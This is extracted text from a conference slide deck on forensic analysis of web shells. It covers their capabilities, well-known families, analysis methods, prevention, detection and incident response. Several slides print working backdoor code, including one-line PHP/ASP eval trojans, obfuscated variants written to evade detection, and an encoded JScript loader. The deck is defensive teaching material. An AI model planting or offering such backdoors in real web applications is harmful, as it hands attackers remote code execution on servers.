Advanced Web Shell Forensic Analysis - index-of.co.ukindex-of.co.uk/Webshell/advanced-web-shell... · - The Art of War by Sun Tzu Why do we need to analyze them? Web Shell Analysis

Advanced Web Shell Forensic Analysis Pt. 1 & 2 5-25-2016

Vincent Lo, LYLC Spear & Shield 1

1

Advanced Web Shell Forensic Analysis

Vincent Lo

Insert Confidentiality notice here

■ PART ONE ■

2

Reminder


Level : Advanced

Prerequisite :

Basic understanding of server-side scripting language, such as

PHP, ASP, and ASP.NET.



3

Disclaimer


Opinions are my own and not the views of my employer.

4

Who is this guy?

Vincent Lo

Senior Incident Responder

CISSP, CCE, GCFA Gold, GCIH, GNFA, GREM

Twitter ● @_VincentLo_

Email ● [email protected]



5

■ PART ONE ● BASIC ■

1:00 pm – 2:00 pm

■ PART TWO ● ADVANCED ■

2:30 pm – 3:30 pm

What are we talking about today?

Agenda

6


• Introduction

� What are they?

� Well-known well shells


Agenda

• Web Shell Analysis Techniques

� Dynamic behavior analysis

� Static source code analysis



7

■ PART TWO ●ADVANCED ■

• Advanced source code analysis • Advanced Features

� Hidden Shells

� Tunneling

� Mass Mailer

� DDoS

� System targeted shell


Agenda

• Web Shell Prevention

• Web Shell Detection

• Incident Response

8

• Dynamic web pages

• Written in server-side script languages, such as PHP, JSP, ASP, and

ASP.NET

• Discovered many years ago

• Still evolving….

What are they?

Web Shells



99

Master Title

Web ShellsWhat can they do?

10

File Manager

• Copy

• Edit

• Delete

• Move

• Execute

• Upload

What can they do?

Web Shells



11

Server Information

• Operating system information

• Loaded Apache modules

• Disabled PHP functions

• Useful commands

• Downloader commands

• /etc/passwd

What can they do?

Web Shells

12

Server Information

• CPU Info

• Memory Info

• Partition Info

• PHP Environment

What can they do?

Web Shells



13

System Thread Information

• List

• Kill

What can they do?

Web Shells

14

Console

• Run your own commands

What can they do?

Web Shells



15

Console

• List dir

• Find

• Locate

What can they do?

Web Shells

16

PHP

• Execute your own codes

What can they do?

Web Shells



17

String Tools

• String conversion

• Encode/Decode

• MD5 cracking websites

What can they do?

Web Shells

18

Bruteforce

• FTP

• MySql

• PostgreSql

What can they do?

Web Shells



19

SQL

• MySql

• PostgreSql

What can they do?

Web Shells

20

Network

• Bind port to /bin/sh

• Back-connect

What can they do?

Web Shells



21

Self Remove

What can they do?

Web Shells

22

AND MORE…..........(will be introduced in PART TWO.)

What can they do?

Web Shells



23

• WSO (FilesMan)

• b374n

• c99

• China Chopper (client program)

• Weevely

• And more…

Well known web shells

Web Shells

24

Well, what if they are found on your web servers?

Why do we care?

Web Shells



25

Source: http://krebsonsecurity.com/2016/02/breached-credit-union-comes-out-of-its-shell/

Real Incident

Web Shells

26

Source: http://krebsonsecurity.com/2016/02/breached-credit-union-comes-out-of-its-shell/

Real Incident

Web Shells



27

How did they get into our web servers?

Web Shells

28

• Cross-Site Scripting;

• SQL Injection;

• Vulnerabilities in applications/services (e.g., WordPress or other CMS applications);

• File processing vulnerabilities (e.g., upload filtering or assigned permissions);

• Remote File Include (RFI) and Local File Include (LFI) vulnerabilities;

• Exposed Admin Interfaces (possible areas to find vulnerabilities mentioned above).

How did they get into our web servers?

Web Shells

Source: https://www.us-cert.gov/ncas/alerts/TA15-314A



2929

Master Title

Web Shell Analysis“If you know the enemy and yourself, you need not fe ar battles.”

30

“If you know the enemy and yourself, you need not fear battles.

If you know yourself but not the enemy, for every victory gained you will also

suffer a defeat.

If you know neither the enemy nor yourself, you will succumb in every battle.”

- The Art of War by Sun Tzu

Why do we need to analyze them?

Web Shell Analysis



31

• Dynamic behavior analysis

• Static source code analysis

� What to look for?

� What to do if it is packed?

� What if….?

• Advanced source code analysis

How to analyze them?

Web Shell Analysis

32

• Analysis Environment

� Sandbox

� Private Network

• Operating System

� Linux

� Windows

Dynamic behavior analysis | Environment

Web Shell Analysis

• Web Server

� Apache

� IIS

� Java Web Server

• Web Server Configuration

� Permission



33

• Consulting work

� Pre-build the environment/template to reduce the response time.

� Try to mimic client’s web server environment as much as possible.


Web Shell Analysis

34

• Ideal Environment


Web Shell Analysis



35

Demonstration

• WSO 2.0

Dynamic behavior analysis

Web Shell Analysis

36

• Pros

� Easy to understand how web shells work.

� Identify their features and artefacts in a short time.

� Can test functions and see if they really work.

• Cons

� May miss hidden functions.

� May not work if web shells require passwords.

� May need time to build/configure the environment.

Dynamic behavior analysis

Web Shell Analysis



37

• First time?

• Need to understand the server-side script languages.

� Google can be your best friend.

• Review codes and get familiar with attack techniques.

• Don’t get discouraged and don’t give up easily.

� Some web shells are designed to be hard to read.

� Some web shells even contain fake functions/codes.

• Don’t worry. The review speed will become faster and faster once you are more familiar with the codes.

Static source code analysis

Web Shell Analysis

38

• Exercise (WSO 2.0)

• Try to identify interesting functions.

Static source code analysis | PHP | What to look for?

Web Shell Analysis



39


• Password

� Password is provided if you are lucky. ☺

� MD5 algorithm?


Web Shell Analysis

40


• Password

� MD5 algorithm!


Web Shell Analysis



41


• Avoid search engines

� HTTP 404 – Not Found

� Exit


Web Shell Analysis

42


• Commands behind the scene


Web Shell Analysis



43


• KOI8-R & KOI8-U


Web Shell Analysis

44

• Variable names

• Passwords

• Interesting functions


Web Shell Analysis

• Comments if you are lucky. ☺



45

• Comments ☺


Web Shell Analysis

46

• Find the password

• Check the source code

• Google

• Crack it

• Bypass/Kill the password

Static source code analysis | PHP | Password protecte d

Web Shell Analysis



47

• Login password

� Validation algorithm

� MD5/SHA1

� Customised algorithm

• HTTP 404 code

• HTTP 404 page

• Variable Names

Static source code analysis | PHP | Obfuscation Techn iques

Web Shell Analysis

48

Static source code analysis | PHP | What if it is pack ed?

Web Shell Analysis



49


Web Shell Analysis

• Decoding environment

� Web server

� Web components

� Browser

• Decoding tools

� Online

� Manual

� May need to develop decoding tools to assist

• Encoding algorithm

� Base64

� ROT13

� Character encoding

� Customised encoding algorithms

� Multiple encoding with different

algorithms

50


Web Shell Analysis


� How to unpack the shell?

� eval => echo



51


Web Shell Analysis

• Exercise (b374k)

� How to unpack the shell?

� String operators

� eval => echo

52

Intermittent

Web Shells<script runat="server" language="JScript">

function exs(str) {

var q = "u";

var w = "afe";

var a = q + "ns" + w;

var b= /*///*/eval(str,a);

return(b);

}

function dec(str,key) {

var k,q,t;

var s="";

var p="";

for(k = 0; k < str.length; k=k+2)

{

t = ((k+2)/2) % key.length;

p = key.substr(t, 1);

if (isFinite(str.substr(k, 1)))

{

q = "0x"+ str.substr(k, 2);

s = s + char(int(q)-p);// + "|" + p +"|";

}

else

{

q = "0x"+ str.substr(k, 4);

s = s + char(int(q)-p);

k = k+2;

}

}

return(s);

}

</script>

<%

exs(exs(dec("556675766874782F4C75696E5E237E2360","1314")));

%>



53


Vincent Lo

Insert Confidentiality notice here

■ PART TWO ■

54


1:00 pm – 2:00 pm

■ PART TWO ● ADVANCED ■

2:30 pm – 3:30 pm


Agenda



55

■ PART TWO ●ADVANCED ■

• Advanced source code analysis

• Advanced Features

� Hidden Shells

� Tunneling

� Mass Mailer

� DDoS

� System targeted shell


Agenda

• Web Shell Prevention

• Web Shell Detection

• Incident Response

5656

Master Title

Advanced Source Code AnalysisWhat if…?



57

Demonstration

ASP | Self Changing Codes

Advanced Source Code Analysis

58

What if…?


• What if we have not much to review?



59

What if…? | One Sentence Trojan


• One Sentence Trojan ( 一句話木馬)

• PHP: <?php eval($_POST[cmd]);?>

• ASP: <%execute(request(”cmd"))%>

• ASP.NET: <%@ Page Language="Jscript"%>

<%eval(Request.Item[”cmd"],”unsafe”)%>

Source: http://baike.baidu.com/view/102246.htm

60



Client/Server Architecture



61



Client Programs

• China Chopper (中国菜刀)

• Lanker (lanker一句话客户端)

• ZV (ZV新型PHP一句话木马客户端GUI版)

• 一句话客户端增强版


62



In the real world, one sentence trojan’s codes are not always the same. They can be modified or encoded to avoid the detection.

• <%eval request("value")%>

• <%execute request("value")%>

• <%execute(request("value"))%>

• <%If Request("value")<>"" Then Execute(Request("value"))%>

• <%if request ("value")<>""then session("value")=request("value"):end if:if session("value")<>"”then execute

session("value")%>




63



How do we analyze it?

• Web server logs

• IDS/IPS alerts

• Proxy logs

• PCAP

6464

Master Title

Advanced FeaturesHidden Shells



65

Hidden | JPEG

Advanced Features

JPEG EXIF

Hide malicious codes in EXIF fields or embed them in files.

Steganography

http://www.slideshare.net/saumilshah/stegosploit-hacking-with-pictures

Source: http://www.arkteam.net/?p=48

6666

Master Title

Advanced FeaturesTunneling



67

Tunneling

Advanced Features

68

SOCKS Proxy | reGeorg

Advanced Features

“The successor to reDuh, pwn a bastion webserver and create SOCKS proxies

through the DMZ. Pivot and pwn. ”

• Client is written in Python

• Support multiple server-side languages

• PHP

• ASPX

• ASHX

• JSP

Source: https://github.com/sensepost/reGeorg



69

Tunna

Advanced Features

“Tunna is a set of tools which will wrap and tunnel any TCP communication over

HTTP. It can be used to bypass network restrictions in fully firewalled environments. ”

• Client is written in Python

• Support multiple server-side languages

• PHP

• ASPX

• JSP

Source: https://github.com/SECFORCE/Tunna

7070

Master Title

Advanced FeaturesMass Mailer



71

Mass Mailer

Advanced Features

7272

Master Title

Advanced FeaturesDistributed Denial of Service



73

Why web servers?

• 24 x 7

• Accessibility

• More powerful than PCs usually

• Bandwidth

DDoS

Advanced Features

Shell Booter• Execute Booter

• Panic Stresser

• Vengeance Booter

• Anonymous Booter

• And more…

74

Advanced Features

DDoS | Shell Booter



75

Advanced Features

DDoS | Shell Booter

7676

Master Title

Advanced FeaturesSystem targeted shells



77

Advanced Features

System targeted web shells | WHMCS Killer

WHMCS

78

Advanced Features

System targeted web shells | WHMCS Killer

WHMCS Killer



79

Advanced Features

System targeted web shells | cPanel Cracker

cPanel

80

Advanced Features

System targeted web shells | cPanel Cracker

cPanel Cracker



8181

Master Title

Web Shell Prevention“Prevention is more important than detection and recovery.”

82

Web Shell Prevention

Web Shell Prevention | Attacks, Vulnerabilities, & P atches

• Web Application Firewall

• Penetration Testing

� Update codes

• Updates & Patches

� Operating System

� Web servers

� Web server components

� CMS & its plugins



83

Web Shell Prevention | Securing CMS


Source: https://www.us-cert.gov/ncas/alerts/TA15-314A

84



Source: http://asd.gov.au/publications/protect/securing-cms.htm



85



Hardening Wordpresshttp://codex.wordpress.org/Hardening_WordPress

Joomla – Security Checklisthttps://docs.joomla.org/Security_Checklist

86


Web Shell Prevention | Upload Function

• Check uploaded files

� Whitelist file extensions

� Check file extension properly

� .php.jpg, .jpg.asp, .php;.jpg and so on.

� Don’t rely on file types

� Be careful about .cer if using IIS

• Randomize uploaded filenames

• Disable “execute” permission

• Don’t call itself “upload”� upload.aspx, upload.php and so on.

• Don’t show the actual path

• Error message

• URL

• Re-encode/re-generate images

• Disable components/functions that are not required.

� eval, base64, gzinflate



8787

Master Title

Web Shell DetectionAre they on our servers?

88

• PHP Shell Detector

• NeoPI

• Web Vulnerability Scanners

• Antivirus programs

• IDS/IPS

Web Shell Detection | How do we detect them?

Web Shell Detection

• File Integrity System

• Customised Script



8989

Master Title

Incident ResponseFind evil

90

• Web server logs

• Check integrity of logs

• Fields

• Proxy logs

• Web site files

• Relevant servers’ logs & artifacts

Find evil | Evidence

Incident Response

• IDS/IPS logs

• Firewall logs



91

• Yara

• Grep

Find evil | How do we find them?

Incident Response

92

Find evil | Experience

Incident Response



93

Find evil | Experience

Incident Response

9494

Master Title

RecapWhat do we learn today?



95

• Well-known web shells

• Dynamic analysis

• Static analysis

• Web shell prevention and detection

• Incident response

• The analysis concept we learn today works for analyzing malicious PowerShell scripts too.

What do we learn today?

Recap

96

Vincent Lo | Senior Incident ResponderTWITTER ■@_VincentLo_

EMAIL ■ [email protected]

LYLC-SPEARANDSHIELD.TUMBLR.COM

THANK YOUTHANK YOU

Documents

Advanced Web Shell Forensic Analysis - index-of.co.ukindex-of.co.uk/Webshell/advanced-web-shell... · - The Art of War by Sun Tzu Why do we need to analyze them? Web Shell Analysis